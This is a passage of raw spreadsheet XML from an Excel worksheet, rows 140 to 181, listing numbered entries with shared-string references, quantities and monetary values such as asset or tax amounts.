      <c r="A140" s="93"/>
      <c r="B140" s="88">
        <v>134</v>
      </c>
      <c r="C140" s="237" t="s">
        <v>3082</v>
      </c>
      <c r="D140" s="238" t="s">
        <v>3083</v>
      </c>
      <c r="E140" s="238" t="s">
        <v>3084</v>
      </c>
      <c r="F140" s="9"/>
      <c r="G140" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H140" s="11">
        <v>1</v>
      </c>
      <c r="I140" s="238" t="s">
        <v>3085</v>
      </c>
      <c r="J140" s="126">
        <v>48974.36</v>
      </c>
      <c r="K140" s="99">
        <v>18777.6</v>
      </c>
      <c r="L140" s="238" t="s">
        <v>3086</v>
      </c>
    </row>
    <row r="141" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A141" s="93"/>
      <c r="B141" s="88">
        <v>135</v>
      </c>
      <c r="C141" s="237" t="s">
        <v>3087</v>
      </c>
      <c r="D141" s="238" t="s">
        <v>2758</v>
      </c>
      <c r="E141" s="238" t="s">
        <v>3088</v>
      </c>
      <c r="F141" s="9"/>
      <c r="G141" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H141" s="11">
        <v>1</v>
      </c>
      <c r="I141" s="238" t="s">
        <v>1035</v>
      </c>
      <c r="J141" s="126">
        <v>1480409.58</v>
      </c>
      <c r="K141" s="99">
        <v>319766.4</v>
      </c>
      <c r="L141" s="10"/>
    </row>
    <row r="142" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A142" s="93"/>
      <c r="B142" s="88">
        <v>136</v>
      </c>
      <c r="C142" s="237" t="s">
        <v>3089</v>
      </c>
      <c r="D142" s="238" t="s">
        <v>3090</v>
      </c>
      <c r="E142" s="238" t="s">
        <v>3091</v>
      </c>
      <c r="F142" s="9"/>
      <c r="G142" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H142" s="11">
        <v>2</v>
      </c>
      <c r="I142" s="238" t="s">
        <v>1035</v>
      </c>
      <c r="J142" s="126">
        <v>26000</v>
      </c>
      <c r="K142" s="99">
        <v>1040</v>
      </c>
      <c r="L142" s="10">
        <v>3800</v>
      </c>
    </row>
    <row r="143" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A143" s="93"/>
      <c r="B143" s="88">
        <v>137</v>
      </c>
      <c r="C143" s="237" t="s">
        <v>3092</v>
      </c>
      <c r="D143" s="238" t="s">
        <v>3093</v>
      </c>
      <c r="E143" s="238" t="s">
        <v>3094</v>
      </c>
      <c r="F143" s="9"/>
      <c r="G143" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H143" s="11">
        <v>2</v>
      </c>
      <c r="I143" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J143" s="126">
        <v>1582000</v>
      </c>
      <c r="K143" s="99">
        <v>0</v>
      </c>
      <c r="L143" s="10"/>
    </row>
    <row r="144" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A144" s="93"/>
      <c r="B144" s="88">
        <v>138</v>
      </c>
      <c r="C144" s="237" t="s">
        <v>3096</v>
      </c>
      <c r="D144" s="238" t="s">
        <v>3097</v>
      </c>
      <c r="E144" s="238" t="s">
        <v>3098</v>
      </c>
      <c r="F144" s="9"/>
      <c r="G144" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H144" s="11">
        <v>1</v>
      </c>
      <c r="I144" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J144" s="126">
        <v>1540750</v>
      </c>
      <c r="K144" s="99">
        <v>332791.2</v>
      </c>
      <c r="L144" s="10"/>
    </row>
    <row r="145" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A145" s="93"/>
      <c r="B145" s="88">
        <v>139</v>
      </c>
      <c r="C145" s="237" t="s">
        <v>3099</v>
      </c>
      <c r="D145" s="238" t="s">
        <v>2787</v>
      </c>
      <c r="E145" s="238" t="s">
        <v>3100</v>
      </c>
      <c r="F145" s="9"/>
      <c r="G145" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H145" s="11">
        <v>1</v>
      </c>
      <c r="I145" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J145" s="126">
        <v>573690</v>
      </c>
      <c r="K145" s="99">
        <v>123897.6</v>
      </c>
      <c r="L145" s="10"/>
    </row>
    <row r="146" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A146" s="93"/>
      <c r="B146" s="88">
        <v>140</v>
      </c>
      <c r="C146" s="237" t="s">
        <v>3101</v>
      </c>
      <c r="D146" s="238" t="s">
        <v>2784</v>
      </c>
      <c r="E146" s="238" t="s">
        <v>3100</v>
      </c>
      <c r="F146" s="9"/>
      <c r="G146" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H146" s="11">
        <v>1</v>
      </c>
      <c r="I146" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J146" s="126">
        <v>566890</v>
      </c>
      <c r="K146" s="99">
        <v>122428.8</v>
      </c>
      <c r="L146" s="10"/>
    </row>
    <row r="147" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A147" s="93"/>
      <c r="B147" s="88">
        <v>141</v>
      </c>
      <c r="C147" s="237" t="s">
        <v>3102</v>
      </c>
      <c r="D147" s="238" t="s">
        <v>2790</v>
      </c>
      <c r="E147" s="238" t="s">
        <v>3103</v>
      </c>
      <c r="F147" s="9"/>
      <c r="G147" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H147" s="11">
        <v>1</v>
      </c>
      <c r="I147" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J147" s="126">
        <v>1355000</v>
      </c>
      <c r="K147" s="99">
        <v>292680</v>
      </c>
      <c r="L147" s="10"/>
    </row>
    <row r="148" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A148" s="93"/>
      <c r="B148" s="88">
        <v>142</v>
      </c>
      <c r="C148" s="237" t="s">
        <v>3104</v>
      </c>
      <c r="D148" s="238" t="s">
        <v>2911</v>
      </c>
      <c r="E148" s="238" t="s">
        <v>3105</v>
      </c>
      <c r="F148" s="9"/>
      <c r="G148" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H148" s="11">
        <v>1</v>
      </c>
      <c r="I148" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J148" s="126">
        <v>668910</v>
      </c>
      <c r="K148" s="99">
        <v>144482.4</v>
      </c>
      <c r="L148" s="10"/>
    </row>
    <row r="149" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A149" s="93"/>
      <c r="B149" s="88">
        <v>143</v>
      </c>
      <c r="C149" s="237" t="s">
        <v>3106</v>
      </c>
      <c r="D149" s="238" t="s">
        <v>3107</v>
      </c>
      <c r="E149" s="238" t="s">
        <v>3108</v>
      </c>
      <c r="F149" s="9"/>
      <c r="G149" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H149" s="11">
        <v>1</v>
      </c>
      <c r="I149" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J149" s="126">
        <v>1329000</v>
      </c>
      <c r="K149" s="99">
        <v>287064</v>
      </c>
      <c r="L149" s="10"/>
    </row>
    <row r="150" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A150" s="93"/>
      <c r="B150" s="88">
        <v>144</v>
      </c>
      <c r="C150" s="237" t="s">
        <v>3109</v>
      </c>
      <c r="D150" s="238" t="s">
        <v>3110</v>
      </c>
      <c r="E150" s="238" t="s">
        <v>3111</v>
      </c>
      <c r="F150" s="9"/>
      <c r="G150" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H150" s="11">
        <v>1</v>
      </c>
      <c r="I150" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J150" s="126">
        <v>666840</v>
      </c>
      <c r="K150" s="99">
        <v>112022.4</v>
      </c>
      <c r="L150" s="10"/>
    </row>
    <row r="151" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A151" s="93"/>
      <c r="B151" s="88">
        <v>145</v>
      </c>
      <c r="C151" s="237" t="s">
        <v>3112</v>
      </c>
      <c r="D151" s="238" t="s">
        <v>2798</v>
      </c>
      <c r="E151" s="238" t="s">
        <v>3113</v>
      </c>
      <c r="F151" s="9"/>
      <c r="G151" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H151" s="11">
        <v>3</v>
      </c>
      <c r="I151" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J151" s="126">
        <v>1440000</v>
      </c>
      <c r="K151" s="99">
        <v>241920</v>
      </c>
      <c r="L151" s="10"/>
    </row>
    <row r="152" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A152" s="93"/>
      <c r="B152" s="88">
        <v>146</v>
      </c>
      <c r="C152" s="237" t="s">
        <v>3114</v>
      </c>
      <c r="D152" s="238" t="s">
        <v>3115</v>
      </c>
      <c r="E152" s="238" t="s">
        <v>3116</v>
      </c>
      <c r="F152" s="9"/>
      <c r="G152" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H152" s="11">
        <v>1</v>
      </c>
      <c r="I152" s="238" t="s">
        <v>3095</v>
      </c>
      <c r="J152" s="126">
        <v>5720.47</v>
      </c>
      <c r="K152" s="99">
        <v>228</v>
      </c>
      <c r="L152" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="153" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A153" s="93"/>
      <c r="B153" s="88">
        <v>147</v>
      </c>
      <c r="C153" s="237" t="s">
        <v>3117</v>
      </c>
      <c r="D153" s="238" t="s">
        <v>3118</v>
      </c>
      <c r="E153" s="238" t="s">
        <v>792</v>
      </c>
      <c r="F153" s="9"/>
      <c r="G153" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H153" s="11">
        <v>1</v>
      </c>
      <c r="I153" s="238" t="s">
        <v>273</v>
      </c>
      <c r="J153" s="126">
        <v>28000</v>
      </c>
      <c r="K153" s="99">
        <v>4704</v>
      </c>
      <c r="L153" s="10"/>
    </row>
    <row r="154" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A154" s="93"/>
      <c r="B154" s="88">
        <v>148</v>
      </c>
      <c r="C154" s="237" t="s">
        <v>3119</v>
      </c>
      <c r="D154" s="238" t="s">
        <v>852</v>
      </c>
      <c r="E154" s="238" t="s">
        <v>3120</v>
      </c>
      <c r="F154" s="9"/>
      <c r="G154" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H154" s="11">
        <v>1</v>
      </c>
      <c r="I154" s="238" t="s">
        <v>310</v>
      </c>
      <c r="J154" s="126">
        <v>6000</v>
      </c>
      <c r="K154" s="99">
        <v>1008</v>
      </c>
      <c r="L154" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="155" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A155" s="93"/>
      <c r="B155" s="88">
        <v>149</v>
      </c>
      <c r="C155" s="237" t="s">
        <v>3121</v>
      </c>
      <c r="D155" s="238" t="s">
        <v>864</v>
      </c>
      <c r="E155" s="238" t="s">
        <v>3122</v>
      </c>
      <c r="F155" s="9"/>
      <c r="G155" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H155" s="11">
        <v>1</v>
      </c>
      <c r="I155" s="238" t="s">
        <v>326</v>
      </c>
      <c r="J155" s="126">
        <v>80000</v>
      </c>
      <c r="K155" s="99">
        <v>13440</v>
      </c>
      <c r="L155" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="156" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A156" s="93"/>
      <c r="B156" s="88">
        <v>150</v>
      </c>
      <c r="C156" s="237" t="s">
        <v>3123</v>
      </c>
      <c r="D156" s="238" t="s">
        <v>3124</v>
      </c>
      <c r="E156" s="238" t="s">
        <v>3120</v>
      </c>
      <c r="F156" s="9"/>
      <c r="G156" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H156" s="11">
        <v>1</v>
      </c>
      <c r="I156" s="238" t="s">
        <v>326</v>
      </c>
      <c r="J156" s="126">
        <v>10000</v>
      </c>
      <c r="K156" s="99">
        <v>1680</v>
      </c>
      <c r="L156" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="157" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A157" s="93"/>
      <c r="B157" s="88">
        <v>151</v>
      </c>
      <c r="C157" s="237" t="s">
        <v>3125</v>
      </c>
      <c r="D157" s="238" t="s">
        <v>3126</v>
      </c>
      <c r="E157" s="238" t="s">
        <v>3127</v>
      </c>
      <c r="F157" s="9"/>
      <c r="G157" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H157" s="11">
        <v>1</v>
      </c>
      <c r="I157" s="238" t="s">
        <v>326</v>
      </c>
      <c r="J157" s="126">
        <v>8000</v>
      </c>
      <c r="K157" s="99">
        <v>1344</v>
      </c>
      <c r="L157" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="158" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A158" s="93"/>
      <c r="B158" s="88">
        <v>152</v>
      </c>
      <c r="C158" s="237" t="s">
        <v>3128</v>
      </c>
      <c r="D158" s="238" t="s">
        <v>3129</v>
      </c>
      <c r="E158" s="238" t="s">
        <v>3130</v>
      </c>
      <c r="F158" s="9"/>
      <c r="G158" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H158" s="11">
        <v>1</v>
      </c>
      <c r="I158" s="238" t="s">
        <v>326</v>
      </c>
      <c r="J158" s="126">
        <v>120000</v>
      </c>
      <c r="K158" s="99">
        <v>0</v>
      </c>
      <c r="L158" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="159" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A159" s="93"/>
      <c r="B159" s="88">
        <v>153</v>
      </c>
      <c r="C159" s="237" t="s">
        <v>3131</v>
      </c>
      <c r="D159" s="238" t="s">
        <v>3132</v>
      </c>
      <c r="E159" s="238" t="s">
        <v>3133</v>
      </c>
      <c r="F159" s="9"/>
      <c r="G159" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H159" s="11">
        <v>1</v>
      </c>
      <c r="I159" s="238" t="s">
        <v>326</v>
      </c>
      <c r="J159" s="126">
        <v>7800</v>
      </c>
      <c r="K159" s="99">
        <v>1310.4</v>
      </c>
      <c r="L159" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="160" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A160" s="93"/>
      <c r="B160" s="88">
        <v>154</v>
      </c>
      <c r="C160" s="237" t="s">
        <v>3134</v>
      </c>
      <c r="D160" s="238" t="s">
        <v>864</v>
      </c>
      <c r="E160" s="238" t="s">
        <v>3135</v>
      </c>
      <c r="F160" s="9"/>
      <c r="G160" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H160" s="11">
        <v>1</v>
      </c>
      <c r="I160" s="238" t="s">
        <v>326</v>
      </c>
      <c r="J160" s="126">
        <v>89000</v>
      </c>
      <c r="K160" s="99">
        <v>1424</v>
      </c>
      <c r="L160" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="161" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A161" s="93"/>
      <c r="B161" s="88">
        <v>155</v>
      </c>
      <c r="C161" s="237" t="s">
        <v>3136</v>
      </c>
      <c r="D161" s="238" t="s">
        <v>3137</v>
      </c>
      <c r="E161" s="238" t="s">
        <v>3138</v>
      </c>
      <c r="F161" s="9"/>
      <c r="G161" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H161" s="11">
        <v>1</v>
      </c>
      <c r="I161" s="238" t="s">
        <v>1079</v>
      </c>
      <c r="J161" s="126">
        <v>99000</v>
      </c>
      <c r="K161" s="99">
        <v>16632</v>
      </c>
      <c r="L161" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="162" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A162" s="93"/>
      <c r="B162" s="88">
        <v>156</v>
      </c>
      <c r="C162" s="237" t="s">
        <v>3139</v>
      </c>
      <c r="D162" s="238" t="s">
        <v>3140</v>
      </c>
      <c r="E162" s="238" t="s">
        <v>3120</v>
      </c>
      <c r="F162" s="9"/>
      <c r="G162" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H162" s="11">
        <v>1</v>
      </c>
      <c r="I162" s="238" t="s">
        <v>1079</v>
      </c>
      <c r="J162" s="126">
        <v>60000</v>
      </c>
      <c r="K162" s="99">
        <v>10080</v>
      </c>
      <c r="L162" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="163" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A163" s="93"/>
      <c r="B163" s="88">
        <v>157</v>
      </c>
      <c r="C163" s="237" t="s">
        <v>3141</v>
      </c>
      <c r="D163" s="238" t="s">
        <v>3142</v>
      </c>
      <c r="E163" s="238" t="s">
        <v>3143</v>
      </c>
      <c r="F163" s="9"/>
      <c r="G163" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H163" s="11">
        <v>1</v>
      </c>
      <c r="I163" s="238" t="s">
        <v>1079</v>
      </c>
      <c r="J163" s="126">
        <v>2449377.99</v>
      </c>
      <c r="K163" s="99">
        <v>529048.8</v>
      </c>
      <c r="L163" s="10"/>
    </row>
    <row r="164" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A164" s="93"/>
      <c r="B164" s="88">
        <v>158</v>
      </c>
      <c r="C164" s="237" t="s">
        <v>3144</v>
      </c>
      <c r="D164" s="238" t="s">
        <v>3145</v>
      </c>
      <c r="E164" s="238" t="s">
        <v>710</v>
      </c>
      <c r="F164" s="9"/>
      <c r="G164" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H164" s="11">
        <v>1</v>
      </c>
      <c r="I164" s="238" t="s">
        <v>1079</v>
      </c>
      <c r="J164" s="126">
        <v>120000</v>
      </c>
      <c r="K164" s="99">
        <v>25920</v>
      </c>
      <c r="L164" s="10"/>
    </row>
    <row r="165" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A165" s="93"/>
      <c r="B165" s="88">
        <v>159</v>
      </c>
      <c r="C165" s="237" t="s">
        <v>3146</v>
      </c>
      <c r="D165" s="238" t="s">
        <v>3147</v>
      </c>
      <c r="E165" s="238" t="s">
        <v>710</v>
      </c>
      <c r="F165" s="9"/>
      <c r="G165" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H165" s="11">
        <v>1</v>
      </c>
      <c r="I165" s="238" t="s">
        <v>1079</v>
      </c>
      <c r="J165" s="126">
        <v>120000</v>
      </c>
      <c r="K165" s="99">
        <v>25920</v>
      </c>
      <c r="L165" s="10"/>
    </row>
    <row r="166" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A166" s="93"/>
      <c r="B166" s="88">
        <v>160</v>
      </c>
      <c r="C166" s="237" t="s">
        <v>3148</v>
      </c>
      <c r="D166" s="238" t="s">
        <v>3149</v>
      </c>
      <c r="E166" s="238" t="s">
        <v>710</v>
      </c>
      <c r="F166" s="9"/>
      <c r="G166" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H166" s="11">
        <v>1</v>
      </c>
      <c r="I166" s="238" t="s">
        <v>1079</v>
      </c>
      <c r="J166" s="126">
        <v>1073800</v>
      </c>
      <c r="K166" s="99">
        <v>180398.4</v>
      </c>
      <c r="L166" s="10"/>
    </row>
    <row r="167" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A167" s="93"/>
      <c r="B167" s="88">
        <v>161</v>
      </c>
      <c r="C167" s="237" t="s">
        <v>3150</v>
      </c>
      <c r="D167" s="238" t="s">
        <v>3151</v>
      </c>
      <c r="E167" s="238" t="s">
        <v>714</v>
      </c>
      <c r="F167" s="9"/>
      <c r="G167" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H167" s="11">
        <v>1</v>
      </c>
      <c r="I167" s="238" t="s">
        <v>1079</v>
      </c>
      <c r="J167" s="126">
        <v>1390040</v>
      </c>
      <c r="K167" s="99">
        <v>233587.2</v>
      </c>
      <c r="L167" s="10"/>
    </row>
    <row r="168" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A168" s="93"/>
      <c r="B168" s="88">
        <v>162</v>
      </c>
      <c r="C168" s="237" t="s">
        <v>3152</v>
      </c>
      <c r="D168" s="238" t="s">
        <v>2896</v>
      </c>
      <c r="E168" s="238" t="s">
        <v>3153</v>
      </c>
      <c r="F168" s="9"/>
      <c r="G168" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H168" s="11">
        <v>1</v>
      </c>
      <c r="I168" s="238" t="s">
        <v>1094</v>
      </c>
      <c r="J168" s="126">
        <v>3742564.62</v>
      </c>
      <c r="K168" s="99">
        <v>778440</v>
      </c>
      <c r="L168" s="10"/>
    </row>
    <row r="169" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A169" s="93"/>
      <c r="B169" s="88">
        <v>163</v>
      </c>
      <c r="C169" s="237" t="s">
        <v>3154</v>
      </c>
      <c r="D169" s="238" t="s">
        <v>3155</v>
      </c>
      <c r="E169" s="238" t="s">
        <v>3156</v>
      </c>
      <c r="F169" s="9"/>
      <c r="G169" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H169" s="11">
        <v>1</v>
      </c>
      <c r="I169" s="238" t="s">
        <v>3157</v>
      </c>
      <c r="J169" s="126">
        <v>172300</v>
      </c>
      <c r="K169" s="99">
        <v>35838.4</v>
      </c>
      <c r="L169" s="10"/>
    </row>
    <row r="170" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A170" s="93"/>
      <c r="B170" s="88">
        <v>164</v>
      </c>
      <c r="C170" s="237" t="s">
        <v>3158</v>
      </c>
      <c r="D170" s="238" t="s">
        <v>3159</v>
      </c>
      <c r="E170" s="10"/>
      <c r="F170" s="9"/>
      <c r="G170" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H170" s="11">
        <v>1</v>
      </c>
      <c r="I170" s="238" t="s">
        <v>3157</v>
      </c>
      <c r="J170" s="126">
        <v>135000</v>
      </c>
      <c r="K170" s="99">
        <v>28080</v>
      </c>
      <c r="L170" s="10"/>
    </row>
    <row r="171" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A171" s="93"/>
      <c r="B171" s="88">
        <v>165</v>
      </c>
      <c r="C171" s="237" t="s">
        <v>3160</v>
      </c>
      <c r="D171" s="238" t="s">
        <v>3067</v>
      </c>
      <c r="E171" s="238" t="s">
        <v>1076</v>
      </c>
      <c r="F171" s="9"/>
      <c r="G171" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H171" s="11">
        <v>2</v>
      </c>
      <c r="I171" s="238" t="s">
        <v>3161</v>
      </c>
      <c r="J171" s="126">
        <v>102545</v>
      </c>
      <c r="K171" s="99">
        <v>21320</v>
      </c>
      <c r="L171" s="238" t="s">
        <v>3162</v>
      </c>
    </row>
    <row r="172" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A172" s="93"/>
      <c r="B172" s="88">
        <v>166</v>
      </c>
      <c r="C172" s="237" t="s">
        <v>3163</v>
      </c>
      <c r="D172" s="238" t="s">
        <v>2892</v>
      </c>
      <c r="E172" s="238" t="s">
        <v>3164</v>
      </c>
      <c r="F172" s="9"/>
      <c r="G172" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H172" s="11">
        <v>1</v>
      </c>
      <c r="I172" s="238" t="s">
        <v>1100</v>
      </c>
      <c r="J172" s="126">
        <v>23000</v>
      </c>
      <c r="K172" s="99">
        <v>920</v>
      </c>
      <c r="L172" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="173" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A173" s="93"/>
      <c r="B173" s="88">
        <v>167</v>
      </c>
      <c r="C173" s="237" t="s">
        <v>3165</v>
      </c>
      <c r="D173" s="238" t="s">
        <v>3166</v>
      </c>
      <c r="E173" s="10"/>
      <c r="F173" s="9"/>
      <c r="G173" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H173" s="11">
        <v>1</v>
      </c>
      <c r="I173" s="238" t="s">
        <v>2152</v>
      </c>
      <c r="J173" s="126">
        <v>150000</v>
      </c>
      <c r="K173" s="99">
        <v>0</v>
      </c>
      <c r="L173" s="10"/>
    </row>
    <row r="174" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A174" s="93"/>
      <c r="B174" s="88">
        <v>168</v>
      </c>
      <c r="C174" s="237" t="s">
        <v>3167</v>
      </c>
      <c r="D174" s="238" t="s">
        <v>2892</v>
      </c>
      <c r="E174" s="238" t="s">
        <v>3164</v>
      </c>
      <c r="F174" s="9"/>
      <c r="G174" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H174" s="11">
        <v>1</v>
      </c>
      <c r="I174" s="238" t="s">
        <v>2152</v>
      </c>
      <c r="J174" s="126">
        <v>167000</v>
      </c>
      <c r="K174" s="99">
        <v>6680</v>
      </c>
      <c r="L174" s="10"/>
    </row>
    <row r="175" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A175" s="93"/>
      <c r="B175" s="88">
        <v>169</v>
      </c>
      <c r="C175" s="237" t="s">
        <v>3168</v>
      </c>
      <c r="D175" s="238" t="s">
        <v>2892</v>
      </c>
      <c r="E175" s="238" t="s">
        <v>3164</v>
      </c>
      <c r="F175" s="9"/>
      <c r="G175" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H175" s="11">
        <v>2</v>
      </c>
      <c r="I175" s="238" t="s">
        <v>2152</v>
      </c>
      <c r="J175" s="126">
        <v>334362</v>
      </c>
      <c r="K175" s="99">
        <v>13372</v>
      </c>
      <c r="L175" s="10"/>
    </row>
    <row r="176" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A176" s="93"/>
      <c r="B176" s="88">
        <v>170</v>
      </c>
      <c r="C176" s="237" t="s">
        <v>3169</v>
      </c>
      <c r="D176" s="238" t="s">
        <v>3170</v>
      </c>
      <c r="E176" s="238" t="s">
        <v>3171</v>
      </c>
      <c r="F176" s="9"/>
      <c r="G176" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H176" s="11">
        <v>1</v>
      </c>
      <c r="I176" s="238" t="s">
        <v>2152</v>
      </c>
      <c r="J176" s="126">
        <v>1705440</v>
      </c>
      <c r="K176" s="99">
        <v>136432</v>
      </c>
      <c r="L176" s="10"/>
    </row>
    <row r="177" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A177" s="93"/>
      <c r="B177" s="88">
        <v>171</v>
      </c>
      <c r="C177" s="237" t="s">
        <v>3172</v>
      </c>
      <c r="D177" s="238" t="s">
        <v>431</v>
      </c>
      <c r="E177" s="238" t="s">
        <v>3173</v>
      </c>
      <c r="F177" s="9"/>
      <c r="G177" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H177" s="11">
        <v>1</v>
      </c>
      <c r="I177" s="238" t="s">
        <v>2152</v>
      </c>
      <c r="J177" s="126">
        <v>266000</v>
      </c>
      <c r="K177" s="99">
        <v>55328</v>
      </c>
      <c r="L177" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="178" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A178" s="93"/>
      <c r="B178" s="88">
        <v>172</v>
      </c>
      <c r="C178" s="237" t="s">
        <v>3174</v>
      </c>
      <c r="D178" s="238" t="s">
        <v>532</v>
      </c>
      <c r="E178" s="238" t="s">
        <v>282</v>
      </c>
      <c r="F178" s="9"/>
      <c r="G178" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H178" s="11">
        <v>1</v>
      </c>
      <c r="I178" s="238" t="s">
        <v>2152</v>
      </c>
      <c r="J178" s="126">
        <v>14500</v>
      </c>
      <c r="K178" s="99">
        <v>3016</v>
      </c>
      <c r="L178" s="10"/>
    </row>
    <row r="179" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A179" s="93"/>
      <c r="B179" s="88">
        <v>173</v>
      </c>
      <c r="C179" s="237" t="s">
        <v>3175</v>
      </c>
      <c r="D179" s="238" t="s">
        <v>431</v>
      </c>
      <c r="E179" s="238" t="s">
        <v>3176</v>
      </c>
      <c r="F179" s="9"/>
      <c r="G179" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H179" s="11">
        <v>1</v>
      </c>
      <c r="I179" s="238" t="s">
        <v>2152</v>
      </c>
      <c r="J179" s="126">
        <v>280000</v>
      </c>
      <c r="K179" s="99">
        <v>58240</v>
      </c>
      <c r="L179" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="180" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A180" s="93"/>
      <c r="B180" s="88">
        <v>174</v>
      </c>
      <c r="C180" s="237" t="s">
        <v>3177</v>
      </c>
      <c r="D180" s="238" t="s">
        <v>3178</v>
      </c>
      <c r="E180" s="238" t="s">
        <v>3179</v>
      </c>
      <c r="F180" s="9"/>
      <c r="G180" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H180" s="11">
        <v>1</v>
      </c>
      <c r="I180" s="238" t="s">
        <v>2152</v>
      </c>
      <c r="J180" s="126">
        <v>88000</v>
      </c>
      <c r="K180" s="99">
        <v>3520</v>
      </c>
      <c r="L180" s="10"/>
    </row>
    <row r="181" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A181" s="93"/>
      <c r="B181" s="88">
        <v>175</v>
      </c>
      <c r="C181" s="237" t="s">
        <v>3180</v>
      </c>
      <c r="D181" s="238" t="s">
        <v>1037</v>
      </c>
      <c r="E181" s="238" t="s">
        <v>3181</v>
      </c>
      <c r="F181" s="9"/>
      <c r="G181" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H181" s="11">
        <v>1</v>
      </c>
      <c r="I181" s="238" t="s">
        <v>339</v>
      </c>
      <c r="J181" s="126">
        <v>3200</v>
      </c>
      <c r="K181" s="99">
        <v>665.6</v>
      </c>
